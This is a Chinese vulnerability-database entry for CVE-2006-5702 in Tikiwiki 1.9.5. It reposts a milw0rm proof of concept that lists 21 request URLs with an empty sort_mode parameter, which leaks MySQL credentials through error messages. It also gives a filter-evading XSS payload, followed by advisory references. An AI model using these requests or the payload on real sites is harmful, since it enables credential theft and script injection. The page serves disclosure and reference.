Tikiwiki信息披露和跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111450 漏洞类型 信息泄露
发布时间 2006-11-01 更新时间 2006-11-07
CVE编号 CVE-2006-5702 CNNVD-ID CNNVD-200611-051
漏洞平台 PHP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/2701
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200611-051
|漏洞详情
Tikiwiki远程攻击者在(1)tiki-listpages.php,(2)tiki-lastchanges.php,(3)messu-archive.php,(4)messu-mailbox.php,(5)messu-sent.php,(6)tiki-directory_add_site.php,(7)tiki-directory_ranking.php,(8)tiki-directory_search.php,(9)tiki-forums.php,(10)tiki-view_forum.php,(11)tiki-friends.php,(12)tiki-list_blogs.php,(13)tiki-list_faqs.php,(14)tiki-list_trackers.php,(15)tiki-list_users.php,(16)tiki-my_tiki.php,(17)tiki-notepad_list.php,(18)tiki-orphan_pages.php,(19)tiki-shoutbox.php,(20)tiki-usermenu.php和(21)tiki-webmail_contacts.php内的空的sort_mode参数,造成系统在某些数据库出错消息内泄漏信息,从而获取敏感信息(MySQL用户名和密码)。
|漏洞EXP
/*==========================================*/
//tikiwiki version 1.9.5 (CVS) -Sirius-  (PoC)
// Product: Tikiwiki 
// URL: http://tikiwiki.org/
// RISK: critical
/*==========================================*/




there's a critical security bug in tikiwiki version 1.9.5 (CVS) -Sirius-
a anonymous user , can dump the mysql user & passwd just by creating a mysql error with the "sort_mode" var , with those following links :
/tiki-listpages.php?offset=0&sort_mode=
/tiki-lastchanges.php?days=1&offset=0&sort_mode=
/messu-archive.php?sort_mode=
/messu-mailbox.php?sort_mode=
/messu-sent.php?sort_mode=
/tiki-directory_add_site.php?sort_mode=
/tiki-directory_ranking.php?sort_mode=
/tiki-directory_search.php?sort_mode=
/tiki-forums.php?sort_mode=
/tiki-view_forum.php?forumId=
/tiki-friends.php?sort_mode=
/tiki-list_blogs.php?sort_mode=
/tiki-list_faqs.php?sort_mode=
/tiki-list_trackers.php?sort_mode=
/tiki-list_users.php?sort_mode=
/tiki-my_tiki.php?sort_mode=
/tiki-notepad_list.php?sort_mode=
/tiki-orphan_pages.php?sort_mode=
/tiki-shoutbox.php?sort_mode=
/tiki-usermenu.php?sort_mode=
/tiki-webmail_contacts.php?sort_mode=

a proof of concept is disponible here : http://cockor.free.fr/PoC.swf

there's also a xss here :
/tiki-featured_link.php?type=f&url=" ></iframe><scr</script>ipt>alert('XSS')</scri</script>pt> <!--

regards , securfrog 

# milw0rm.com [2006-11-01]
|参考资料

来源:BID
名称:20858
链接:http://www.securityfocus.com/bid/20858
来源:BUGTRAQ
名称:20061101tikiwiki1.9.5mysqlpassworddisclosure&xss
链接:http://www.securityfocus.com/archive/1/archive/1/450268/100/0/threaded
来源:SECUNIA
名称:22678
链接:http://secunia.com/advisories/22678
来源:XF
名称:tikiwiki-password-info-disclosure(29960)
链接:http://xforce.iss.net/xforce/xfdb/29960
来源:VUPEN
名称:ADV-2006-4316
链接:http://www.frsirt.com/english/advisories/2006/4316
来源:SREASON
名称:1816
链接:http://securityreason.com/securityalert/1816
来源:GENTOO
名称:GLSA-200611-11
链接:http://security.gentoo.org/glsa/glsa-200611-11.xml
来源:SECUNIA
名称:23039
链接:http://secunia.com/advisories/23039